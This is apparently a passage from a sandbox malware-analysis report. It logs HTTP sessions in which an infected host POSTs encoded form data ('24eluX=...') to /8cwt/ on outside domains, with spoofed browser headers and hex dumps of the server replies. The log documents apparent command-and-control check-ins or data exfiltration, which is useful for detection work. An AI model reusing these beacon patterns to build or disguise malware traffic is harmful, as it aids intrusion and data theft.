                                      67192.168.11.304991693.125.99.13480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:06.288086891 CEST700OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 53 57 43 37 59 37 67 4c 56 30 54 79 62 45 42 6e 6b 58 79 5a 66 70 42 35 66 62 65 4b 41 54 33 47 6c 76 43 78 6b 71 4d 35 6d 4c 43 55 54 6d 4c 32 49 37 6f 73 75 34 59 74 4f 62 47 62 53 68 31 49 61 5a 65 4c 72 69 6e 39 41 58 56 35 53 2f 32 6f 39 6e 4a 69 6c 4c 78 53 71 33 6a 72 6b 64 53 39 48 41 78 61 65 69 48 6f 75 4b 54 45 41 55 68 63 70 49 5a 30 6b 47 56 71 31 6a 42 37 72 4b 32 58 6a 72 53 51 43 6c 74 68 54 6a 35 6c 71 76 48 30 36 74 6b 43 7a 6d 4b 56 2b 46 31 61 5a 7a 53 61 42 64 51 64 76 68 51 6d 4e 4b 68 58 46 62 79 43 35 73 58 61 6d 6b 36 42 38 30 30 54 39 70 72 65 30 36 54 52 4a 71 31 62 70 5a 73 3d
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKAT3GlvCxkqM5mLCUTmL2I7osu4YtObGbSh1IaZeLrin9AXV5S/2o9nJilLxSq3jrkdS9HAxaeiHouKTEAUhcpIZ0kGVq1jB7rK2XjrSQClthTj5lqvH06tkCzmKV+F1aZzSaBdQdvhQmNKhXFbyC5sXamk6B800T9pre06TRJq1bpZs=
                                      Jun 4, 2024 14:23:06.860879898 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
                                      Jun 4, 2024 14:23:06.861012936 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:23:06.861027956 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:23:06.861057043 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:23:06.861170053 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:23:06.861196041 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:23:06.861237049 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:23:06.861248970 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:23:06.861298084 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:23:06.861452103 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:23:06.861591101 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      68192.168.11.304991793.125.99.13480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:09.061326981 CEST1617OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 53 57 43 37 59 37 67 4c 56 30 54 79 62 45 42 6e 6b 58 79 5a 66 70 42 35 66 62 65 4b 41 54 50 47 6d 63 36 78 6c 4c 4d 35 70 72 43 55 49 6d 4c 7a 49 37 6f 39 75 34 41 68 4f 62 4b 4c 53 6a 4e 49 63 37 47 4c 74 54 6e 39 4f 6e 56 35 61 66 32 72 2b 58 4a 4e 6c 4b 64 65 71 33 7a 72 6b 64 53 39 48 44 35 61 49 6e 37 6f 68 71 54 44 48 55 68 75 69 6f 59 6a 6b 47 63 58 31 6a 4e 4e 73 37 57 58 6a 4c 43 51 44 58 31 68 52 44 35 6e 35 66 48 61 36 73 5a 43 7a 6d 57 6f 2b 47 70 38 5a 77 79 61 53 73 78 78 71 44 55 47 65 35 46 58 41 61 4c 37 6f 63 44 71 35 57 2b 6d 7a 55 6f 6a 30 36 48 4d 36 4b 6e 7a 4e 6f 56 4d 38 73 58 6e 61 57 51 72 66 72 63 65 6c 33 52 34 51 36 44 46 7a 47 57 76 42 73 4b 68 70 79 44 6a 56 6b 59 4f 56 47 67 4b 2b 6b 2b 50 52 65 45 4d 58 6f 2b 48 67 53 4e 54 34 6a 4b 32 32 65 62 46 67 33 31 6e 4b 42 46 6e 66 77 47 43 4e 30 73 46 59 35 77 51 73 46 45 4b 67 66 32 36 47 65 4a 67 62 61 74 6b 6c 78 7a 39 45 62 7a 2f 72 47 2b 48 33 70 7a 77 33 6f 48 [TRUNCATED]
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKATPGmc6xlLM5prCUImLzI7o9u4AhObKLSjNIc7GLtTn9OnV5af2r+XJNlKdeq3zrkdS9HD5aIn7ohqTDHUhuioYjkGcX1jNNs7WXjLCQDX1hRD5n5fHa6sZCzmWo+Gp8ZwyaSsxxqDUGe5FXAaL7ocDq5W+mzUoj06HM6KnzNoVM8sXnaWQrfrcel3R4Q6DFzGWvBsKhpyDjVkYOVGgK+k+PReEMXo+HgSNT4jK22ebFg31nKBFnfwGCN0sFY5wQsFEKgf26GeJgbatklxz9Ebz/rG+H3pzw3oH73XtMzTiB7quQEV1kjn6yTKmTNDrkT3FuC6CZtdTX/EK1YkMJwVxwbRQ7Rc7wzo2tePCbYi1oAB0jh05U3gMnP4KIgHaOhcBVVlnhte4FHKEthVv2qPnpTjfq6rfNXmb0B5tFT9WxuvIr3Q2Xv2KYzReeson9ItbzmPmuG6p9xnQsI98UkU87McG497Y/QL+tHq8g5x8gpRlin0TMjFHQBNvqy8C2i79iSUBFpIZutWggZSAxKge9I20KeGrFKaUJ0IHDtlsAoTYJbn1uN1b9KP+RP3mh0xNb2ZxbXcL9hpl0aLywx/CkqqXd1KPo3v5rXn4cCztZkEoZLIaeJFElcGfc0LGzFLSY18te92wMksQ/iC2ItYGw8MVFeYTqXqmaRQDdPEV2msBgVqtnu8qliaKsc+u+zzhQkmeLazh9D7y4uwJ+kjyEzCymJyi+1BsJESjjZzmUxps7EuXMO5ojy7oomc4pmzTSphhEx4Np8SvXf5i52uwShHLADLaFEU54fdGJQWbJA7OAPIgP6YlNRVvDGFboSKT2Hf5IXZH+EBz7p98E63JAmGG6KOfY6bh2yjvRvZ+9U2Mie7n8paX0q2TLwb4TsYEcrOU5T+jiwwYVrD8/Lz/uzxQwsEx8sV6cCt10PSeexvsez+Y1VjZsaN0LzoBWU7NaJ [TRUNCATED]
                                      Jun 4, 2024 14:23:09.707195044 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:23:09 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
                                      Jun 4, 2024 14:23:09.707231998 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:23:09.707259893 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:23:09.707360029 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:23:09.707514048 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:23:09.707526922 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:23:09.707537889 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:23:09.707550049 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:23:09.707652092 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:23:09.707655907 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:23:09.707665920 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      69192.168.11.304991893.125.99.13480
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:11.841664076 CEST425OUTGET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:23:12.088104010 CEST548INHTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:23:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 0
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      x-redirect-by: WordPress
                                      location: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6
                                      x-litespeed-cache: hit
                                      x-turbo-charged-by: LiteSpeed
                                      Server: LiteSpeed


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      70192.168.11.304991934.232.203.7080
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:17.243041039 CEST674OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 78 64 48 75 35 66 43 2f 38 75 45 7a 47 42 76 63 30 36 4b 5a 4c 4c 57 74 37 49 75 36 72 59 5a 61 6e 4c 4d 61 6e 41 57 50 34 4d 32 66 43 45 76 6e 54 78 43 34 63 44 37 66 53 48 62 76 2f 46 50 59 4c 4b 54 4f 51 4f 36 58 6d 5a 58 39 41 6c 45 67 62 69 69 62 7a 77 57 34 57 49 6c 35 75 55 30 52 2b 4b 48 4a 76 56 75 31 58 43 76 77 6b 59 66 4f 73 69 53 79 42 65 53 4c 4a 7a 4e 6b 38 35 73 39 49 59 38 43 44 45 6f 41 54 38 70 6e 74 49 31 48 4b 36 51 62 32 4d 35 2b 48 37 74 55 66 34 6e 4b 39 72 6b 31 61 7a 36 36 35 38 41 54 39 67 50 71 6a 56 63 32 79 2f 38 72 4d 74 6a 75 2f 44 6b 6d 4a 51 3d 3d
                                      Data Ascii: 24eluX=xdHu5fC/8uEzGBvc06KZLLWt7Iu6rYZanLManAWP4M2fCEvnTxC4cD7fSHbv/FPYLKTOQO6XmZX9AlEgbiibzwW4WIl5uU0R+KHJvVu1XCvwkYfOsiSyBeSLJzNk85s9IY8CDEoAT8pntI1HK6Qb2M5+H7tUf4nK9rk1az6658AT9gPqjVc2y/8rMtju/DkmJQ==
                                      Jun 4, 2024 14:23:17.376660109 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:23:17 GMT
